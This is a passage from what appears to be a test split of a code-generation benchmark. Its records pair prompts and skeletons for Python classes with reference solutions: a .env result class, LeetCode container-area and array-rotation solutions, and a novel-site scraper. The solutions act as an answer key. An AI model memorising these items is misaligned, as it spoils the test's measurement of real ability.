repr_parts.append(repr(parser_failure_info))\nfile_path = self.file_path\nif file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\nrepr_parts.append('>')\nreturn ''.join(repr_parts)"], "bodies_text": "<|body_start_0|>\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n<|end_body_2|>\n\n<|body_start_3|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_3|>\n", "class_docstring": "Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.", "class_name": "DotEnvResult", "detected_licenses": ["LicenseRef-scancode-warranty-disclaimer"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n <|body_0|>\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n <|body_1|>\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n <|body_2|>\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n<|end_body_2|>\n\n<|body_start_3|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000466", "length_bytes": 5881, "license_type": "permissive", "methods": [{"docstring": "Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.", "name": "__new__", "signature": "def __new__(cls, variables, parser_failure_info, file_path)"}, {"docstring": "Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`", "name": "insert_to_environmental_variables", "signature": "def insert_to_environmental_variables(self)"}, {"docstring": "Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError", "name": "raise_if_failed", "signature": "def raise_if_failed(self)"}, {"docstring": "Returns the dot env result's representation.", "name": "__repr__", "signature": "def __repr__(self)"}], "n_methods": 4, "prompt": "Implement the Python class `DotEnvResult` described below.\n\nClass description:\nRepresents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\n\nMethod signatures and docstrings:\n- def __new__(cls, variables, parser_failure_info, file_path): Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\n- def insert_to_environmental_variables(self): Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\n- def raise_if_failed(self): Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\n- def __repr__(self): Returns the dot env result's representation.", "prompted_full_text": "Implement the Python class `DotEnvResult` described below.\n\nClass description:\nRepresents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\n\nMethod signatures and docstrings:\n- def __new__(cls, variables, parser_failure_info, file_path): Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\n- def insert_to_environmental_variables(self): Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\n- def raise_if_failed(self): Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\n- def __repr__(self): Returns the dot env result's representation.\n\n<|skeleton|>\nclass DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n <|body_0|>\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n <|body_1|>\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n <|body_2|>\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n<|end_body_0|>\n\n<|body_start_1|>\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n<|end_body_1|>\n\n<|body_start_2|>\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n<|end_body_2|>\n\n<|body_start_3|>\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n<|end_body_3|>\n", "revision_id": "53f24fdb38459dc5a4fd04f11bdbfee8295b76a4", "skeleton": "<|skeleton|>\nclass DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n <|body_0|>\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n <|body_1|>\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n <|body_2|>\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DotEnvResult:\n \"\"\"Represents result of loading a `.env` file or just content. Attributes ---------- file_path : `str` Path to the loaded file. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. variables : `dict` The loaded environmental variables.\"\"\"\n\n def __new__(cls, variables, parser_failure_info, file_path):\n \"\"\"Creates a new dot-env result. Parameters ---------- variables : `dict` The loaded environmental variables. parser_failure_info : `None`, ``ParserFailureInfo`` Failure info if parsing failed. file_path : `str` Path to the loaded file.\"\"\"\n self = object.__new__(cls)\n self.variables = variables\n self.parser_failure_info = parser_failure_info\n self.file_path = file_path\n return self\n\n def insert_to_environmental_variables(self):\n \"\"\"Inserts the parsed variables into the environmental ones. If the variable already exists, will not overwrite it. Returns ------- self : `instance>`\"\"\"\n for key, value in self.variables.items():\n if value is None:\n value = ''\n environmental_variables.setdefault(key, value)\n if environmental_variables_binary is not None:\n environmental_variables_binary.setdefault(key.encode(), value.encode())\n return self\n\n def raise_if_failed(self):\n \"\"\"Raises an exception with a reason why loading failed. Returns ------- self : `instance>` Raises ------ SyntaxError\"\"\"\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n raise SyntaxError(parser_failure_info.get_error_message(), (self.file_path, parser_failure_info.line_index + 1, parser_failure_info.index + 1, parser_failure_info.line))\n return self\n\n def __repr__(self):\n \"\"\"Returns the dot env result's representation.\"\"\"\n repr_parts = ['<', self.__class__.__name__]\n repr_parts.append(' variables: ')\n repr_parts.append(repr(len(self.variables)))\n parser_failure_info = self.parser_failure_info\n if parser_failure_info is not None:\n repr_parts.append(', parser_failure_info = ')\n repr_parts.append(repr(parser_failure_info))\n file_path = self.file_path\n if file_path is not None:\n repr_parts.append(' file_path = ')\n repr_parts.append(repr(file_path))\n repr_parts.append('>')\n return ''.join(repr_parts)\n", "source": "the_stack_v2_python_sparse", "source_path": "hata/env/loading.py", "source_repo": "HuyaneMatsu/hata", "split": "test", "star_events_count": 3} {"blob_id": "b14c241912377e20b9cd05c7dbf38419fc272ab7", "bodies": ["l = height\nsize = 0\nfor i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\nreturn size", "head = 0\ntail = len(height) - 1\nsize = 0\nwhile head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\nreturn size"], "bodies_text": "<|body_start_0|>\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000467", "length_bytes": 1118, "license_type": "no_license", "methods": [{"docstring": ":type height: List[int] :rtype: int", "name": "maxAreaBrute", "signature": "def maxAreaBrute(self, height)"}, {"docstring": ":type height: List[int] :rtype: int", "name": "maxArea", "signature": "def maxArea(self, height)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_val_000227", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAreaBrute(self, height): :type height: List[int] :rtype: int\n- def maxArea(self, height): :type height: List[int] :rtype: int", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def maxAreaBrute(self, height): :type height: List[int] :rtype: int\n- def maxArea(self, height): :type height: List[int] :rtype: int\n\n<|skeleton|>\nclass Solution:\n\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n<|end_body_1|>\n", "revision_id": "673fb7bb900e65844b68b5826a259eb6932c5fc4", "skeleton": "<|skeleton|>\nclass Solution:\n\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def maxAreaBrute(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n l = height\n size = 0\n for i in range(len(l)):\n for j in range(i, len(l)):\n print(l[i], l[j])\n if l[i] < l[j]:\n size = max(size, l[i] * (j - i))\n else:\n size = max(size, l[j] * (j - i))\n return size\n\n def maxArea(self, height):\n \"\"\":type height: List[int] :rtype: int\"\"\"\n head = 0\n tail = len(height) - 1\n size = 0\n while head < tail:\n size = max(size, min(height[head], height[tail]) * (tail - head))\n if height[head] < height[tail]:\n head += 1\n else:\n tail -= 1\n return size\n", "source": "the_stack_v2_python_sparse", "source_path": "11. Container With Most Water.py", "source_repo": "MysticEEEE/LeetCodeProblems", "split": "test", "star_events_count": 0} {"blob_id": "f8f5abe5119d83aa6a2066384693226d96de6478", "bodies": ["logger.debug('Visiting %s', self.novel_url)\nsoup = self.get_soup(self.novel_url)\nself.novel_title = soup.select_one('div.book-name').text.strip()\nlogger.info('Novel title: %s', self.novel_title)\nself.novel_author = soup.select_one('div.author span.name').text.strip()\nlogger.info('Novel author: %s', self.novel_author)\nself.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\nlogger.info('Novel cover: %s', self.novel_cover)\nchapters = soup.select('ul.chapter-list a')\nfor a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\nlogger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))", "logger.info('Downloading %s', chapter['url'])\nsoup = self.get_soup(chapter['url'])\nchapter['title'] = soup.select_one('h1.chapter-title').text.strip()\nself.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\nbody_parts = soup.select_one('div.chapter-entity')\nfor br in body_parts.select('br'):\n br.decompose()\nbody = self.extract_contents(body_parts)\nreturn '

' + '

'.join(body) + '

'"], "bodies_text": "<|body_start_0|>\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n<|end_body_0|>\n\n<|body_start_1|>\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '

' + '

'.join(body) + '

'\n<|end_body_1|>\n", "class_docstring": "", "class_name": "NovelUpdatesCC", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass NovelUpdatesCC:\n\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n <|body_0|>\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n<|end_body_0|>\n\n<|body_start_1|>\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '

' + '

'.join(body) + '

'\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000468", "length_bytes": 3146, "license_type": "permissive", "methods": [{"docstring": "Get novel title, autor, cover etc", "name": "read_novel_info", "signature": "def read_novel_info(self)"}, {"docstring": "Download body of a single chapter and return as clean html format.", "name": "download_chapter_body", "signature": "def download_chapter_body(self, chapter)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_test_000311", "prompt": "Implement the Python class `NovelUpdatesCC` described below.\n\nClass description:\nImplement the NovelUpdatesCC class.\n\nMethod signatures and docstrings:\n- def read_novel_info(self): Get novel title, autor, cover etc\n- def download_chapter_body(self, chapter): Download body of a single chapter and return as clean html format.", "prompted_full_text": "Implement the Python class `NovelUpdatesCC` described below.\n\nClass description:\nImplement the NovelUpdatesCC class.\n\nMethod signatures and docstrings:\n- def read_novel_info(self): Get novel title, autor, cover etc\n- def download_chapter_body(self, chapter): Download body of a single chapter and return as clean html format.\n\n<|skeleton|>\nclass NovelUpdatesCC:\n\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n <|body_0|>\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n<|end_body_0|>\n\n<|body_start_1|>\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '

' + '

'.join(body) + '

'\n<|end_body_1|>\n", "revision_id": "451e816ab03c8466be90f6f0b3eaa52d799140ce", "skeleton": "<|skeleton|>\nclass NovelUpdatesCC:\n\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n <|body_0|>\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class NovelUpdatesCC:\n def read_novel_info(self):\n \"\"\"Get novel title, autor, cover etc\"\"\"\n logger.debug('Visiting %s', self.novel_url)\n soup = self.get_soup(self.novel_url)\n self.novel_title = soup.select_one('div.book-name').text.strip()\n logger.info('Novel title: %s', self.novel_title)\n self.novel_author = soup.select_one('div.author span.name').text.strip()\n logger.info('Novel author: %s', self.novel_author)\n self.novel_cover = self.absolute_url(soup.select_one('div.book-img img')['src'])\n logger.info('Novel cover: %s', self.novel_cover)\n chapters = soup.select('ul.chapter-list a')\n for a in chapters:\n chap_id = len(self.chapters) + 1\n if len(self.chapters) % 100 == 0:\n vol_id = chap_id // 100 + 1\n vol_title = 'Volume ' + str(vol_id)\n self.volumes.append({'id': vol_id, 'title': vol_title})\n self.chapters.append({'id': chap_id, 'volume': vol_id, 'url': self.absolute_url(a['href']), 'title': a.select_one('p.chapter-name').text.strip() or 'Chapter %d' % chap_id})\n logger.info('%d chapters and %d volumes found', len(self.chapters), len(self.volumes))\n\n def download_chapter_body(self, chapter):\n \"\"\"Download body of a single chapter and return as clean html format.\"\"\"\n logger.info('Downloading %s', chapter['url'])\n soup = self.get_soup(chapter['url'])\n chapter['title'] = soup.select_one('h1.chapter-title').text.strip()\n self.blacklist_patterns = ['^translat(ed by|or)', '(volume|chapter) .?\\\\d+']\n body_parts = soup.select_one('div.chapter-entity')\n for br in body_parts.select('br'):\n br.decompose()\n body = self.extract_contents(body_parts)\n return '

' + '

'.join(body) + '

'\n", "source": "the_stack_v2_python_sparse", "source_path": "lncrawl/sources/novelupdatescc.py", "source_repo": "NNTin/lightnovel-crawler", "split": "test", "star_events_count": 2} {"blob_id": "c9c20bac00aaa7aded58be2194a496c1dbe97725", "bodies": ["k = k % len(nums)\nfor i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last", "k = k % len(nums)\n\ndef reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\nreverse(nums, 0, len(nums) - 1)\nreverse(nums, 0, k - 1)\nreverse(nums, k, len(nums) - 1)"], "bodies_text": "<|body_start_0|>\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n<|end_body_0|>\n\n<|body_start_1|>\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n<|end_body_0|>\n\n<|body_start_1|>\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000469", "length_bytes": 1025, "license_type": "no_license", "methods": [{"docstring": "Do not return anything, modify nums in-place instead.", "name": "rotate_1", "signature": "def rotate_1(self, nums: List[int], k: int) -> None"}, {"docstring": "Do not return anything, modify nums in-place instead.", "name": "rotate_2", "signature": "def rotate_2(self, nums: List[int], k: int) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_002902", "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rotate_1(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.\n- def rotate_2(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def rotate_1(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.\n- def rotate_2(self, nums: List[int], k: int) -> None: Do not return anything, modify nums in-place instead.\n\n<|skeleton|>\nclass Solution:\n\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n k = k % len(nums)\n for i in range(k):\n last = nums[-1]\n for j in range(len(nums) - 1, 0, -1):\n nums[j] = nums[j - 1]\n nums[0] = last\n<|end_body_0|>\n\n<|body_start_1|>\n k = k % len(nums)\n\n def reverse(nums, left, right):\n while left < right:\n nums[left], nums[right] = (nums[right], nums[left])\n left += 1\n right -= 1\n reverse(nums, 0, len(nums) - 1)\n reverse(nums, 0, k - 1)\n reverse(nums, k, len(nums) - 1)\n<|end_body_1|>\n", "revision_id": "d3b6883bb8b5cef30369b606d6b3ea3029b798c7", "skeleton": "<|skeleton|>\nclass Solution:\n\n def rotate_1(self, nums: List[int], k: int) -> None:\n \"\"\"Do not return anything, modify nums in-place instead.\"\"\"\n <|body_0|>\n\n def rotate_2(self, nums: List[int], k: int) -> None:\n 